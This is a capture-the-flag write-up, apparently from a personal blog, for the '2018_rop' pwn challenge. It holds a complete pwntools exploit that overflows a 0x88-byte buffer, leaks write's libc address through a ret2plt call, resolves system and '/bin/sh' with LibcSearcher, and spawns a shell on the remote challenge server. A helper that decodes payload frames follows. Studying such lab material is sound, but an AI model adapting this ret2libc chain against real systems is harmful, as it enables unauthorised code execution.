2018_rop

A simple ROP challenge

Open the binary and you find a vulnerable function.

[Figure: the vulnerable function]

A quick look shows the overflow comes from filling buf; the offset is 0x88. The binary provides neither a system function nor a "/bin/sh" string, so both have to be obtained another way: leak a libc address, then compute them from libc.

```python
from pwn import *
from LibcSearcher import *

elf = ELF('./2018_rop')
# p = process('./2018_rop')
p = remote('node4.buuoj.cn',25867)

# Addresses that are fixed in the (non-PIE) binary itself.
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

# Stage 1: 0x88 bytes reach the saved ebp, 4 more overwrite it, then the return address.
payload = flat(['a'*0x88,'a'*4,write_plt,main_addr,1,write_got,4])
# After the overflow, control lands on ret: call write with arguments (1, write's GOT address, 4),
# then return to main so the program can be overflowed a second time.

p.sendline(payload)

# The 4 bytes written are the resolved libc address of write.
write_addr = u32(p.recv(4))
print(hex(write_addr))

# Identify the libc build from the leaked address and compute the base.
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

# Stage 2: same layout, now returning into system.
payload = flat(['a'*0x88,'a'*4,system_addr,0xdeadbeef,binsh_addr])
# After the overflow, control lands on ret: call system with argument '/bin/sh';
# the return address 0xdeadbeef is never used because the shell does not return.

p.sendline(payload)

p.interactive()
```
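To make the frame layout the comments describe explicit, here is an added example (not part of the writeup and not the author's code) that decodes a captured stage-1 payload back into its 32-bit cdecl frame, and checks a leaked write address for page alignment before turning it into libc addresses, the step the script above performs with LibcSearcher. The addresses, GOT/PLT values and libc offsets in it are constructed placeholders, not values from the real binary or any real libc.

```python
import struct

# Frame geometry from the writeup: 0x88 bytes of padding reach the saved ebp,
# then 4 bytes of saved ebp, then the overwritten return address.
PADDING = 0x88
SAVED_EBP_SIZE = 4

def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian dword (same as pwntools p32)."""
    return struct.pack('<I', value)

def parse_forged_frame(payload: bytes, padding: int = PADDING, n_args: int = 3) -> dict:
    """Decode a 32-bit cdecl ret2plt frame from a captured overflow payload.

    After the padding and saved ebp the layout is
        [ret] [return-after-call] [arg1] ... [argN]
    The first dword is consumed by the vulnerable function's `ret`; the
    second is where the called function returns; the rest are its arguments.
    """
    start = padding + SAVED_EBP_SIZE
    end = start + 4 * (2 + n_args)
    if len(payload) < end:
        raise ValueError(f'payload too short: need {end} bytes, got {len(payload)}')
    words = struct.unpack('<' + 'I' * (2 + n_args), payload[start:end])
    return {'ret': words[0], 'return_after_call': words[1], 'args': list(words[2:])}

def resolve_from_leak(leaked_write: int, offsets: dict) -> dict:
    """Turn a leaked write() address into libc base, system and "/bin/sh".

    `offsets` holds symbol offsets relative to the libc base for the target's
    libc build (the writeup obtains them from LibcSearcher). A libc image is
    mapped page-aligned, so a base with low bits set means the leak or the
    offset table is wrong; failing here is cheaper than debugging a crash later.
    """
    base = leaked_write - offsets['write']
    if base & 0xfff:
        raise ValueError(f'libc base {base:#x} is not page aligned: wrong libc or bad leak')
    return {
        'base': base,
        'system': base + offsets['system'],
        'binsh': base + offsets['str_bin_sh'],
    }

# Constructed sample values: placeholders, not taken from the real binary or a real libc.
WRITE_PLT = 0x08048390
WRITE_GOT = 0x0804a01c
MAIN_ADDR = 0x08048560
SAMPLE_OFFSETS = {'write': 0xd5f10, 'system': 0x3ada0, 'str_bin_sh': 0x15ba0b}
SAMPLE_LEAK = 0xf7e45f10

def demo() -> dict:
    # Stage-1 payload laid out exactly like the writeup's first flat([...]) call.
    stage1 = (b'a' * PADDING + b'b' * SAVED_EBP_SIZE + p32(WRITE_PLT) + p32(MAIN_ADDR)
              + p32(1) + p32(WRITE_GOT) + p32(4))
    frame = parse_forged_frame(stage1)
    resolved = resolve_from_leak(SAMPLE_LEAK, SAMPLE_OFFSETS)
    return {'frame': frame, 'resolved': resolved}

if __name__ == '__main__':
    out = demo()
    f = out['frame']
    print(f"ret -> {f['ret']:#x}, then -> {f['return_after_call']:#x}, "
          f"args = {[hex(a) for a in f['args']]}")
    print({k: hex(v) for k, v in out['resolved'].items()})
```

The decoder is what you would run over a payload captured in a crash dump or a pcap to see which function was called with which arguments; the alignment check is the one-line sanity test worth adding to the script above right after `libc_base` is computed.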
Author: 饼干

Published: 2021-10-10

Updated: 2021-10-11
